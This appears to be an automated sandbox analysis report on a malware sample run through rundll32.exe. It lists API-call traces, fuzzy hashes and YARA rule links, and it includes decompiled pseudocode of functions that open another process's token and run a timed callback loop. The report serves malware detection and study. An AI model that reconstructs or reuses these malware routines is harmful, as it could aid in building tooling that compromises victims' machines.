Part of subcall function 03367C17: CloseHandle.KERNEL32(?,?,?,0334F0A9), ref: 03367C5F
Part of subcall function 03367C17: RtlEnterCriticalSection.NTDLL(?), ref: 03367C67
Part of subcall function 03367C17: RtlLeaveCriticalSection.NTDLL(?), ref: 03367C7F
Part of subcall function 03367C17: CloseHandle.KERNEL32(?), ref: 03367C9B
Part of subcall function 03367C17: LocalFree.KERNEL32(?), ref: 03367CA6
Part of subcall function 03367C17: RtlDeleteCriticalSection.NTDLL(?), ref: 03367CB0

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 1103286547-0
Opcode ID: 264e94c528c9a1da21e9a871b92a3a612689a19b203551e750b3114eef104f15
Instruction ID: 4ddbf8e66c4a44eaea22309790eaed946c1378417d9711430339e8e3c06fe1c7
Opcode Fuzzy Hash: 264e94c528c9a1da21e9a871b92a3a612689a19b203551e750b3114eef104f15
Instruction Fuzzy Hash: B3F0C837B403107BD630BB62DC8DF4B7E9EEB40761F044114F605EA194CA2C9845CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03353421, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 03353433

Part of subcall function 0335AA30: CreateFileW.KERNEL32(00000000,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 0335AA70
Part of subcall function 0335AA30: GetLastError.KERNEL32 ref: 0335AA7A
Part of subcall function 0335AA30: WaitForSingleObject.KERNEL32(000000C8), ref: 0335AA9F
Part of subcall function 0335AA30: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 0335AAC2
Part of subcall function 0335AA30: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 0335AAEA
Part of subcall function 0335AA30: WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 0335AAFF
Part of subcall function 0335AA30: SetEndOfFile.KERNEL32(00000001), ref: 0335AB0C
Part of subcall function 0335AA30: CloseHandle.KERNEL32(00000001), ref: 0335AB24

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0335D68A,?,?,00001000,?,?,00001000), ref: 03353456
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0335D68A,?,?,00001000,?,?,00001000), ref: 03353478
GetLastError.KERNEL32(?,0335D68A,?,?,00001000,?,?,00001000), ref: 0335348C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: ce5f038e204363d07b04db52ffb3d025d896ddfb6c4726b20780c0c28ac3e814
Instruction ID: 406cc3b0351741b91cd3f26ec452dd9da62b13c253bc7a3f9b76b3a010d3d16a
Opcode Fuzzy Hash: ce5f038e204363d07b04db52ffb3d025d896ddfb6c4726b20780c0c28ac3e814
Instruction Fuzzy Hash: E8F0C236208704BBDB22AF61DC8DF5A7F2DEF04362F108104FE16D80D0EB7994A08B69

Uniqueness

Uniqueness Score: -1.00%

Function 0335A6CD, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,0335B998,000000FF,0644B7F0,?,?,0334B905,0000003A,0644B7F0), ref: 0335A6E9
GetLastError.KERNEL32(?,?,0334B905,0000003A,0644B7F0,?,?,?,03344C3E,00000000,?,7673D3B0,74E05520), ref: 0335A6F4
WaitNamedPipeA.KERNEL32(00002710), ref: 0335A716
WaitForSingleObject.KERNEL32(00000000,?,?,0334B905,0000003A,0644B7F0,?,?,?,03344C3E,00000000,?,7673D3B0,74E05520), ref: 0335A724

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: ae3ce50e75b6c7a8948c5e192c4b96e30fef687c1b6f7dcef60c9532c859182c
Instruction ID: e62516664251edd46c25d6ad346d0f0d436b13cdcc369adecb06d046555c22a6
Opcode Fuzzy Hash: ae3ce50e75b6c7a8948c5e192c4b96e30fef687c1b6f7dcef60c9532c859182c
Instruction Fuzzy Hash: 08F09032A05120AFD3316AA5ACCDF57BF2DDB013B1F168222FE2AE65A0C7200C50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0334B10E, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,033676BF,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0334B113
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0334B128
wsprintfA.USER32 ref: 0334B144

Part of subcall function 0335241D: memset.NTDLL ref: 03352432
Part of subcall function 0335241D: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 0335246B
Part of subcall function 0335241D: wcstombs.NTDLL ref: 03352475
Part of subcall function 0335241D: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 033524A6
Part of subcall function 0335241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03347B15), ref: 033524D2
Part of subcall function 0335241D: TerminateProcess.KERNEL32(?,000003E5), ref: 033524E8
Part of subcall function 0335241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03347B15), ref: 033524FC
Part of subcall function 0335241D: CloseHandle.KERNEL32(?), ref: 0335252F
Part of subcall function 0335241D: CloseHandle.KERNEL32(?), ref: 03352534

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0334B160

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID:
API String ID: 1624158581-0
Opcode ID: 078b00ecb250b02e05bd98e2a74835b05424f83b6b52b08212b9d7ce443874ce
Instruction ID: 754a1dc96ea5bd89b6cc5edc8450ab66ee40b2ff2c529d492503a5ef417cc61f
Opcode Fuzzy Hash: 078b00ecb250b02e05bd98e2a74835b05424f83b6b52b08212b9d7ce443874ce
Instruction Fuzzy Hash: A6F0E936A00510BBC331671ABC89F5BBEADDFC2B21F040121F911E61B8C724D8058E70

Uniqueness

Uniqueness Score: -1.00%

Function 033541A8, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0644C0A0), ref: 033541B1
Sleep.KERNEL32(0000000A), ref: 033541BB
HeapFree.KERNEL32(00000000,?), ref: 033541E3
RtlLeaveCriticalSection.NTDLL(0644C0A0), ref: 03354201

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 85d8712e28c0d36aa33291a692d1d3629536ba65cd763429b635a78432cbc0da
Instruction ID: 6e9d161c1bda7a3cb1d211c09d5fff66480ab12abe0cb28db6aada5b5e676ef5
Opcode Fuzzy Hash: 85d8712e28c0d36aa33291a692d1d3629536ba65cd763429b635a78432cbc0da
Instruction Fuzzy Hash: 25F01779614240DFEB34EB27ECC9F06BBACAB10301F04C445F956C6295C734D999CA24

Uniqueness

Uniqueness Score: -1.00%

Function 03361684, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0644C0A0), ref: 0336168D
Sleep.KERNEL32(0000000A), ref: 03361697
HeapFree.KERNEL32(00000000), ref: 033616C5
RtlLeaveCriticalSection.NTDLL(0644C0A0), ref: 033616DA

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 1f6b08d75a3086827a450e117fa97f6b3f21542d0b30894d73ff96c68f494412
Instruction ID: 4553fdb078d89377df91f66e2b1daeb5155661fc447b23bc2fbf85dd5fed8997
Opcode Fuzzy Hash: 1f6b08d75a3086827a450e117fa97f6b3f21542d0b30894d73ff96c68f494412
Instruction Fuzzy Hash: DAF0B279A14205DFE738EF16E8C9F25BB69AB04342F08C499E806D7258C738A8858E25

Uniqueness

Uniqueness Score: -1.00%

Function 0335C0B6, Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0335C380

Part of subcall function 03341AE3: GetModuleHandleA.KERNEL32(?,00000020), ref: 03341B08
Part of subcall function 03341AE3: GetProcAddress.KERNEL32(00000000,?), ref: 03341B2A
Part of subcall function 03341AE3: GetProcAddress.KERNEL32(00000000,?), ref: 03341B40
Part of subcall function 03341AE3: GetProcAddress.KERNEL32(00000000,?), ref: 03341B56
Part of subcall function 03341AE3: GetProcAddress.KERNEL32(00000000,?), ref: 03341B6C
Part of subcall function 03341AE3: GetProcAddress.KERNEL32(00000000,?), ref: 03341B82

Part of subcall function 03355C07: memcpy.NTDLL(?,?,0334B0CC,?,?,?,0335FA0E,?,?,?,?,?,00000000), ref: 03355C7B
Part of subcall function 03355C07: memcpy.NTDLL(?,?,?), ref: 03355CE2

memcpy.NTDLL(?,?,?,0335FA0E,?,?,?,?,?,00000000), ref: 0335C22F

Part of subcall function 0334DD00: GetModuleHandleA.KERNEL32(?,?,?,0335C2ED,?,?,?,00000000), ref: 0334DD3E
Part of subcall function 0334DD00: memcpy.NTDLL(?,0337136C,00000018,?,?,?), ref: 0334DDBA

memcpy.NTDLL(?,?,00000018,0335FA0E,?,?,?,?,?,00000000), ref: 0335C27D
memcpy.NTDLL(?,03350FB5,00000800,?,?,?,00000000), ref: 0335C300

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memcpy$AddressProc$HandleModule$memset
String ID:
API String ID: 1554640953-0
Opcode ID: 1d676f972ea2a117153c43d0c8cfbb46927f0db8dce64e3af340dfbbfd9c6c54
Instruction ID: 5be849181e657956d7e5e56490ac444a350eebd35c219349bc3e349881a47173
Opcode Fuzzy Hash: 1d676f972ea2a117153c43d0c8cfbb46927f0db8dce64e3af340dfbbfd9c6c54
Instruction Fuzzy Hash: 25A11A75D0030AEFDF11DF98C8C4EAEBBB4BF04308F1855A9E815AB250D774AA54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0334CC7C, Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0334CCD8
CloseHandle.KERNEL32(?,?,00000100,?,?,?,?,00000000), ref: 0334CD26
HeapFree.KERNEL32(00000000,?,?,00000094,00000000,Function_000012D0,00000000,?,03347B6E,00000000,?,033518FD,00000000,?,Function_0000320A,00000000), ref: 0334D031
GetLastError.KERNEL32(00000000,?,00000000), ref: 0334D333

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 1dcbc9848fcef5809410447c485cd513faaffa2539eaa4c3893047078f45afd5
Instruction ID: 0d1c0c72a40ffcce72e89f36cd68f60fb439636447435990a8ba679ae1a40966
Opcode Fuzzy Hash: 1dcbc9848fcef5809410447c485cd513faaffa2539eaa4c3893047078f45afd5
Instruction Fuzzy Hash: 3751C439A04308BEDF21EF64DCC1FAE37EDEB45710F044062F915EA492DAB5E9518B62

Uniqueness

Uniqueness Score: -1.00%

Function 03344A93, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03344AB9
memcpy.NTDLL ref: 03344AE1

Part of subcall function 0336186D: RtlNtStatusToDosError.NTDLL(00000000), ref: 033618A5
Part of subcall function 0336186D: SetLastError.KERNEL32(00000000), ref: 033618AC

GetLastError.KERNEL32(00000010,00000218,03369D1D,00000100,?,00000318,00000008), ref: 03344AF8
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,03369D1D,00000100), ref: 03344BDB

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: 1622bd522c10e940840c59c36a48b0cd48f9d27a4d69be41d9ea6c50c1e82352
Instruction ID: 73413f28dded831dc6b9caabbd9c821ae8ca6bd5ec81c9ac1f58a147cddc7f8b
Opcode Fuzzy Hash: 1622bd522c10e940840c59c36a48b0cd48f9d27a4d69be41d9ea6c50c1e82352
Instruction Fuzzy Hash: 8D4181B5904705AFD760DF25CC81FABBBF9BB88310F10892DF599C6251E730E5148B62

Uniqueness

Uniqueness Score: -1.00%

Function 03351F7B, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03357F16: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?,?), ref: 03357F3A
Part of subcall function 03357F16: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03357F4C
Part of subcall function 03357F16: wcstombs.NTDLL ref: 03357F5A
Part of subcall function 03357F16: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?), ref: 03357F7E
Part of subcall function 03357F16: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 03357F93
Part of subcall function 03357F16: mbstowcs.NTDLL ref: 03357FA0
Part of subcall function 03357F16: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?,?,?), ref: 03357FB2
Part of subcall function 03357F16: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,03351FB1,?,?,?,?,?), ref: 03357FCC

GetLastError.KERNEL32 ref: 0335201A

Part of subcall function 0335DC77: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0335DD25
Part of subcall function 0335DC77: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0335DD49
Part of subcall function 0335DC77: HeapFree.KERNEL32(00000000,00000000,?,00000000,033711D0,?,?,0334A57C,?,00000000,?,?), ref: 0335DD57

HeapFree.KERNEL32(00000000,?), ref: 03352036
HeapFree.KERNEL32(00000000,?), ref: 03352047
SetLastError.KERNEL32(00000000), ref: 0335204A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: d76738af6cb710034790b47cb49f8ec2e33b0916c065d0953343df86816e3b30
Instruction ID: f61f2b46f1efa2968dbc4d25e1a77ad2135b06df8c459bdfba988b3f816e1ce5
Opcode Fuzzy Hash: d76738af6cb710034790b47cb49f8ec2e33b0916c065d0953343df86816e3b30
Instruction Fuzzy Hash: 45311836900208AFCF22DF99CC85C9EBFB9EF48350F14465AF925E6160C7358A51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0335E2AF, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0335E2FA
memset.NTDLL ref: 0335E311
memset.NTDLL ref: 0335E328
memset.NTDLL ref: 0335E340

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 35eba190e64a50526ce68334abdb76c56009087939bf1753330707e1107f7a76
Instruction ID: ba50f6138b4cd0d3fb1373245963902dfec3216c92279414b7b422f8f4223fb2
Opcode Fuzzy Hash: 35eba190e64a50526ce68334abdb76c56009087939bf1753330707e1107f7a76
Instruction Fuzzy Hash: 942162B6500909BBCB20DF61DCC0EAABB69FF0A3017491119FD4585811D732F6B1DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0336082C, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,03342AFA,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,03358655), ref: 03360838

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

Part of subcall function 03369464: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,03360866,00000000,00000001,00000001,?,?,03342AFA,00000000,00000000,00000000,00000008,0000EA60), ref: 03369472
Part of subcall function 03369464: StrChrA.SHLWAPI(00000000,0000003F,?,?,03342AFA,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,03358655,?,?), ref: 0336947C

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03342AFA,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 03360896
lstrcpy.KERNEL32(00000000,00000000), ref: 033608A6
lstrcpy.KERNEL32(00000000,00000000), ref: 033608B2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: dce8f438324c3924191c259c9207bad2149a41f0f9e3f4ae982b9a5e179d4dc7
Instruction ID: 68cc86519427554b2de3d9032c1308c92f642aad2fbedb123016f76cb0b84007
Opcode Fuzzy Hash: dce8f438324c3924191c259c9207bad2149a41f0f9e3f4ae982b9a5e179d4dc7
Instruction Fuzzy Hash: 01218C76908355EFCB16EF648CC5A9ABFAC9F46290B09D054F805AB219EB34D9408BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0335069D, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 033506D1
memset.NTDLL ref: 033506E8
memset.NTDLL ref: 033506FF
memset.NTDLL ref: 03350717

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d79314098234e02b7e47209390a21b0051e8440e318296f5df4455007d940b36
Instruction ID: 4cd934bc34a93d7b9b197acbfb26b0366fc9a3e9f347b814b077055275d7a02f
Opcode Fuzzy Hash: d79314098234e02b7e47209390a21b0051e8440e318296f5df4455007d940b36
Instruction Fuzzy Hash: F3119EB6900A0ABBDB24EFA1DCC1E6AB769FF09301B090128F94495811D773F5B19FD1

Uniqueness

Uniqueness Score: -1.00%

Function 0335F1DE, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(69B25F44,?,?,00000000,033575D0,00000000,?,69B25F44,?,?,?,?,?,69B25F44,?,00000000), ref: 0335F1EF
lstrlen.KERNEL32(?,?,?,?), ref: 0335F1F4

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 0335F210
lstrcpy.KERNEL32(00000000,?), ref: 0335F22E

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$AllocateHeaplstrcpymemcpy
String ID:
API String ID: 1697500751-0
Opcode ID: 81f38f03a654da6938d60f0d83e6025f5872e483d20fe4ed96a72ff0ba22f6e0
Instruction ID: b7eab3fe0f6e6874e5088b7f1f91495db039db52fd692b4351ba2277b526ae88
Opcode Fuzzy Hash: 81f38f03a654da6938d60f0d83e6025f5872e483d20fe4ed96a72ff0ba22f6e0
Instruction Fuzzy Hash: 73F0CDBE804B41EBE721E6AAAC88E5BBF9CAF85220F184455F94483214E725D4148BB1

Uniqueness

Uniqueness Score: -1.00%

Function 03355E27, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(06448560,00000000,00000000,74E481D0,033584D6,00000000), ref: 03355E37
lstrlen.KERNEL32(?), ref: 03355E3F

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

lstrcpy.KERNEL32(00000000,06448560), ref: 03355E53
lstrcat.KERNEL32(00000000,?), ref: 03355E5E

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: e171b0926fc7fe9bc7a168eca33fb1a9bef6455d1d4a2c9c841ea59f9cdd5ffa
Instruction ID: d308979278c89035be1483de9839e366f191d217d508d9b80663f26306641cf5
Opcode Fuzzy Hash: e171b0926fc7fe9bc7a168eca33fb1a9bef6455d1d4a2c9c841ea59f9cdd5ffa
Instruction Fuzzy Hash: B1E09233905620AF8A11ABA5ACCCC9FFBACEF897507048416F600D3114C72498018FE0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5980 Parent PID: 6424 rundll32.exeCOMMON

Executed Functions

Function 02BD5D10, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02BD5D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02BD75F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02BD4AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02bd5d1d
0x02bd5d1e
0x02bd5d1f
0x02bd5d20
0x02bd5d21
0x02bd5d25
0x02bd5d2c
0x02bd5d3b
0x02bd5d3e
0x02bd5d41
0x02bd5d48
0x02bd5d4b
0x02bd5d4e
0x02bd5d51
0x02bd5d54
0x02bd5d5f
0x02bd5d61
0x02bd5d6a
0x02bd5d72
0x02bd5d74
0x02bd5d86
0x02bd5d90
0x02bd5d94
0x02bd5da3
0x02bd5da7
0x02bd5db0
0x02bd5db8
0x02bd5db8
0x02bd5dba
0x02bd5dba
0x02bd5dc2
0x02bd5dc8
0x02bd5dcc
0x02bd5dcc
0x02bd5dd7

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BD5D57
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BD5D6A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD5D86

Part of subcall function 02BD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,02BD4F70), ref: 02BD7602

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD5DA3
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02BD5DB0
NtClose.NTDLL(?), ref: 02BD5DC2
NtClose.NTDLL(00000000), ref: 02BD5DCC

Memory Dump Source

Source File: 00000004.00000002.525831260.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000004.00000002.525817788.0000000002BD0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525849514.0000000002BDC000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.525856379.0000000002BDD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.525863753.0000000002BDF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 6b4ebf83c0e690a3cb47457e317fcfd3a5436d4adf26f8eccf6ec97e0362f542
Instruction ID: 4b162f6a4fc4e0ceeb8a3c1e913cea83e815c4134f5f31e9fe84417e5b0d6955
Opcode Fuzzy Hash: 6b4ebf83c0e690a3cb47457e317fcfd3a5436d4adf26f8eccf6ec97e0362f542
Instruction Fuzzy Hash: 852136B6901228BBDB01DFA5CC45EDEBFBEEF08790F104462FA00E6110E7718A50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5461, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E02BD5461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2bdd278);
					_v20 = 0;
					_v16 = 0;
					L02BDAED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2bdd2a4; // 0x330
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0 || E02BD502E(_t73) != 0) {
							 *0x2bdd284 = 5;
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2bdd298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02BD577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02BD2107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2bdd27c);
							goto L21;
						} else {
							__eflags =  *0x2bdd280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02BD47D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2bdd280);
								L21:
								L02BDAED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2bdd270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x02bd5461
0x02bd5473
0x02bd5476
0x02bd5482
0x02bd5488
0x02bd548d
0x02bd55f4
0x02bd5493
0x02bd5493
0x02bd5495
0x02bd549a
0x02bd549b
0x02bd54a1
0x02bd54a4
0x02bd54a7
0x02bd54b5
0x02bd54c0
0x02bd54c3
0x02bd54c5
0x02bd54d2
0x02bd54dc
0x02bd54de
0x02bd54e3
0x02bd54e8
0x02bd54f3
0x02bd54f3
0x02bd54fd
0x00000000
0x02bd5500
0x02bd5504
0x02bd550f
0x02bd550f
0x02bd5516
0x02bd551f
0x02bd5526
0x02bd552f
0x02bd5532
0x02bd5535
